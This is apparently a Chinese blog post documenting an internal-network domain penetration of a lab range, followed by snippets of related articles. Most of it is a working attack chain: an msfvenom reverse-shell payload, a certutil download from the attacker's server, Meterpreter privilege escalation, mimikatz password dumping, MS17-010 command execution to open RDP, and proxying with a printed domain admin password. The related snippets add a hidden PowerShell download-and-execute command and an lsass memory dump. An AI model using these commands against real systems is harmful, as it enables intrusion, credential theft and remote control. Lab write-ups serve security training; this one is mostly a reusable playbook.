<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一次對內網的域滲透實戰

    VSole2023-02-13 10:23:09

    環境

    • Kali:192.168.8.128,攻擊機
    • Win7:
    • Web服務器,192.168.8.129
    • 域用戶stu1.god.org192.168.52.143
    • Win2003:域控制器owa.god.org192.168.52.138

    反彈Shell

    • 攻擊機制作木馬文件,實際環境中需做免殺
    $ msfvenom -p windows/meterpreter_reverse_tcp lhost=<攻擊機IP> lport=<攻擊機監聽端口> -f exe -o win.exe
    
    • 攻擊機利用Python開啟HTTP服務
    $ python -m SimpleHTTPServer 8080
    
    • 靶機CMD下載木馬文件
    $ certutil.exe -urlcache -split -f http://<攻擊者IP>:8080/win.exe
    
    • 攻擊機監聽端口
    $ msfconsole
    msf5> use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
    msf5 exploit(multi/handler) > set lhost <攻擊者IP>
    msf5 exploit(multi/handler) > set lport <攻擊機監聽端口>
    msf5 exploit(multi/handler) > run
    [*] Started reverse TCP handler on <攻擊者IP>:<攻擊機監聽端口>
    
    • 最后在靶機處運行木馬
    $ win.exe
    
    • 此時攻擊機即可接收到Shell
    • 提權
    $ getsystem
    
    • 抓取Hash
    meterpreter > run post/windows/gather/smart_hashdump
    
    • 獲取Hash不全,下面使用Mimitakz再次抓取

    MSF-Mimikatz

    MSF中自帶mimikatz模塊(需要Administrator權限或者System權限),且同時支持32位和64位的系統。但是該模塊默認是加載32位的系統,若目標主機是64位,直接默認加載該模塊會導致很多功能無法使用。

    進程遷移

    64位系統需要將Meterpreter進程遷移到一個64位程序的進程中,才能加載mimikatz并且查看系統明文。并且需要遷移到權限為NT AUTHORITY\SYSTEM的進程,因為進程遷移后meterpreter的權限是遷移進程的權限。
    • 查看靶機位數&進程
    meterpreter > sysinfo        # 查看位數
    meterpreter > ps             # 查看進程
    
    • 遷移&加載模塊
    meterpreter > migrate <PID>  # 進程遷移
    meterpreter > load mimikatz  # 加載Mimikatz模塊
    

    抓取Hash

    meterpreter > mimikatz_command -f samdump::hashes
    

    抓取明文密碼

    • 利用sekurlsa模塊下的searchPasswords功能抓取明文密碼
    meterpreter > mimikatz_command -f sekurlsa::searchPasswords
    

    Mimikatz.exe

    • 也可以直接往靶機上傳Mimikatz.exe
    meterpreter > upload /<path>/mimikatz.exe
    
    • 然后查看明文密碼
    meterpreter > shell
    $ mimikatz.exe
    mimikatz # privilege::debug
    mimikatz # sekurlsa::logonPasswords
    

    橫向滲透

    • 定位域控
    meterpreter > shell
    $ net time /domain
    
    • 配置路由
    meterpreter > run autoroute -s 192.168.52.0/24
    
    • 使用NetBIOS協議掃描域網段
    • 掃描到OWA的IP地址為192.168.52.138
    • 其實完整靶場應該還有一臺域用戶Win2003,這里沒開
    meterpreter > background    # 后臺掛起Session
    
    msf5 exploit(multi/handler) > use auxiliary/scanner/netbios/nbname 
    msf5 auxiliary(scanner/netbios/nbname) > set rhosts 192.168.52.0/24
    msf5 auxiliary(scanner/netbios/nbname) > run
    

    MS17-010

    • 掃一下MS17-010
    meterpreter > background    # 后臺掛起Session
    
    msf5 auxiliary(scanner/netbios/nbname) > use auxiliary/scanner/smb/smb_ms17_010 
    msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.52.138
    msf5 auxiliary(scanner/smb/smb_ms17_010) > run
    
    • 可能存在MS17-010,使用ms17_010_command模塊嘗試執行系統命令
    msf5 auxiliary(scanner/smb/smb_ms17_010) > use auxiliary/admin/smb/ms17_010_command
    msf5 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.52.138
    msf5 auxiliary(admin/smb/ms17_010_command) > set command whoami
    msf5 auxiliary(admin/smb/ms17_010_command) > run
    
    • 確定存在該漏洞,繼續使用ms17_010_command模塊開3389端口
    msf5 auxiliary(admin/smb/ms17_010_command) > set command REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    msf5 auxiliary(admin/smb/ms17_010_command) > run
    

    遠程桌面

    • 使用auxiliary/server/socks4a模塊進行代理
    msf5 auxiliary(admin/smb/ms17_010_command) >  use auxiliary/server/socks4a 
    msf5 auxiliary(server/socks4a) > set srvhost <攻擊機IP>
    msf5 auxiliary(server/socks4a) > run
    
    • 然后利用終端代理工具Proxychains-Ng進行遠程登錄,(Proxychains-Ng配置可參考這篇文章),這里還需要修改proxychains.conf配置文件
    $ vim /etc/proxychains.conf 
    
    socks4  <攻擊機IP> 1080
    
    • 使用rdesktop命令打開遠程桌面,使用前面獲取到的域管賬號進行登錄
    • God\Administratos
    • hongrisec@2019.
    $ proxychains rdesktop 192.168.52.138
    
    handlermimikatz
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    主要記錄拿到Shell后再反彈MSF Shell、Mimikatz抓取密碼以及登錄域控等內網部分。前面漏洞環境搭建及打點等不作記錄,可查看參考文章。攻擊機利用Python開啟HTTP服務$ python -m SimpleHTTPServer 8080. 靶機CMD下載木馬文件$ certutil.exe -urlcache -split -f http://<攻擊者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻擊者IP>:<攻擊機監聽端口>. 并且需要遷移到權限為NT AUTHORITY\SYSTEM的進程,因為進程遷移后meterpreter的權限是遷移進程的權限。查看靶機位數&進程meterpreter > sysinfo # 查看位數。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010掃一下MS17-010meterpreter > background # 后臺掛起Session
    powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8888/logo.gif'))\"" /f
    所以可以通過它傳回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 執行該指令,獲取到lsass.dmp
    但其實 Jboss 的這個路徑可以查看到日志
    0x01 簡介本次測試為實戰測試,測試環境是授權項目中的一部分,敏感信息內容已做打碼處理,僅供討論學習。由于本人在內網方面的掌握也是屬于新手階段,運用到的一些msf攻擊手法也很基礎,請各位表哥多多指教。
    所以可以通過它傳回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 執行該指令,獲取到lsass.dmp
    如果找到了某個用戶的ntlm hash,就可以拿這個ntlm hash當作憑證進行遠程登陸了 其中若hash加密方式是 rc4 ,那么就是pass the hash 若加密方式是aes key,那么就是pass the key 注意NTLM和kerberos協議均存在PTH: NTLM自然不用多說 kerberos協議也是基于用戶的client hash開始一步步認證的,自然也會受PTH
    #默認情況下,payload_inject執行之后會在本地產生一個新的handler,由于已經有了一個不需要再產生一個,所以這里設置為true. #這里是當前獲得的session的id. 可以看到 cs 成功接收到 shell右鍵 Interact 調出 beacon 界面,net view 查看當前域中計算機列表,然后執行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig四、制作木馬首先創建監聽器用于木馬回連,Host 為 cs 服務端的 ipAttacks->Packages->Windows Executable?需要派生的目標右擊選擇Spawn,然后創建一個?
    然后設置host,port以及要傳回去的session我們可以看到CS上返回了一個system權限的shell這個時候我們就可以愉快的使用mimikatz等工具來把administrator的密碼偷來但是有的機器改了RDP服務的端口怎么辦呢,我們可以用cs的進程管理,找到rdp服務的PID,然后在beacon中輸入powershell?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类